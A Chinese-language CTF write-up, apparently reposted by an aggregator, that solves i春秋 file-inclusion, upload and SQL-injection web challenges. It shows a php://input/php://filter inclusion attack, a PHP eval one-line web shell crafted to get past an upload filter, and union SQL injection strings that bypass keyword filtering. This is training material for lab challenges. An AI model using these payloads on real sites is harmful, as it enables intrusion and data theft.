i春秋 web

Posted Hello_date

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了i春秋 web相关的知识,希望对你有一定的参考价值。

include

upload

 SQL

 

include

首先是一段代码

 

 提示说是文件包含查找一下allow_url_include,是打开的,那我们就可以用php://input

 

 我先用先用system执行ls命令查看下目录

 

 然后用php://filter来读取文件

 

 就会有一串base64

 

 解码得到flag

upload

首先看的是上传文件的界面,说是可以上传任意文件,那就先上传一句话咯,在我上传之后,点击上传成功就能查看上传的文件,

 

 

 

发现我的一句话的<?被过滤了,首先可以想到绕过,所以,网上可以找一个合适的一句话再次上传试试

<script language="pHp">@eval($_POST[\'sb\'])</script>

 上传之后点击上传成功查看没有内容,应该是被解析了,所以用菜刀连接

 

 

 

 

 

 SQL

对于这个题提示说是注入,我们就尝试注入,我比较笨,试了好多都没有试出来,百度了大佬的wp才发现,他是过滤了select、和=,

而且,一般绕过方式不行,得用<>绕过,长知识啊,然后就开始手工union注入,因为=也被过滤了,所以用REGEXP代替

首先查看显示位

 

 然后获取数据库:?id=1 union se<>lect 1,(sel<>ect(database()) ),3

 

 然后获取表,?id=1 union se<>lect 1,(sel<>ect(group_concat(table_name))from information_schema.tables where table_schema REGEXP \'sqli\'),3

 

 

 然后获取字段名:?id=1 union se<>lect 1,(sel<>ect(group_concat(column_name))from information_schema.columns where table_name REGEXP \'info\'),3

 

 

 然后获取字段内容:?id=1 union se<>lect 1,(sel<>ect(group_concat(flAg_T5ZNdrm))from info ),3

 

以上是关于i春秋 web的主要内容,如果未能解决你的问题,请参考以下文章

i春秋四周年庆典狂欢丨价值6000元的Web安全课程免费送啦

i春秋 “百度杯”CTF比赛 十月场 web题 Backdoor

第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路

戏说春秋_i春秋 writeup

用python爬取i春秋的课程

[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)